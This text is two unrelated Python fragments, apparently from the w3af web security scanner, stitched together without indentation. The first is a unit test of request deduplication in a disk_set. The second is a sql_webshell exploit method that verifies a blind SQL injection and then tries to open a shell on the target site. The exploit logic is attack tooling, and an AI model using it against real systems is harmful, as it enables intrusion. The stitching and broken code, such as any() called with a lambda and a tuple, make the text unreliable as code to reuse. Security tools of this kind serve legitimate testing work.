def test_add_HTTPQSRequest(self):
ds = disk_set()
uri = url_object('http://w3af.org/?id=2')
qsr1 = HTTPQSRequest(uri, method='GET', headers={'Referer': 'http://w3af.org/'})
uri = url_object('http://w3af.org/?id=3')
qsr2 = HTTPQSRequest(uri, method='GET', headers={'Referer': 'http://w3af.com/'})
uri = url_object('http://w3af.org/?id=7')
qsr3 = HTTPQSRequest(uri, method='FOO', headers={'Referer': 'http://w3af.com/'})
ds.add( qsr1 )
ds.add( qsr2 )
ds.add( qsr2 )
ds.add( qsr1 )
self.assertEqual( ds[0] , qsr1)
self.assertEqual( ds[1] , qsr2)
self.assertFalse( qsr3 in ds )
self.assertTrue( qsr2 in ds )
self.assertEqual( len(ds) , 2)
# This forces an internal change in the URL object
qsr2.getURL().url_string
self.assertTrue( qsr2 in ds )
def fastExploit( self ):
'''
Exploits a web app with [blind] sql injections vulns.
The options are configured using the plugin options and setOptions() method.
'''
om.out.debug( 'Starting sql_webshell fastExploit.' )
if any(
lambda attr: attr is None,
(self._url, self._method, self._data, self._injvar)
):
raise w3afException('You have to configure the plugin parameters')
else:
if self._method == 'POST':
freq = httpPostDataRequest(self._url)
elif self._method == 'GET':
freq = HTTPQSRequest(self._url)
else:
raise w3afException('Method not supported.')
freq.setDc(parse_qs(self._data))
bsql = blind_sqli_response_diff(self._uri_opener)
bsql.set_eq_limit(self._eq_limit)
fake_mutants = createMutants(freq, [''], fuzzableParamList=[self._injvar,])
for mutant in fake_mutants:
vuln_obj = bsql.is_injectable(mutant)
if vuln_obj is not None:
om.out.console('SQL injection verified, trying to create the DB driver.')
# Try to get a shell using all vuln
msg = 'Trying to exploit using vulnerability with id: ' + str(vuln_obj.getId())
msg += '. Please wait...'
om.out.console(msg)
shell_obj = self._generateShell(vuln_obj)
if shell_obj is not None:
kb.kb.append(self, 'shell', shell_obj)
return [shell_obj, ]
else:
raise w3afException('No exploitable vulnerabilities found.')
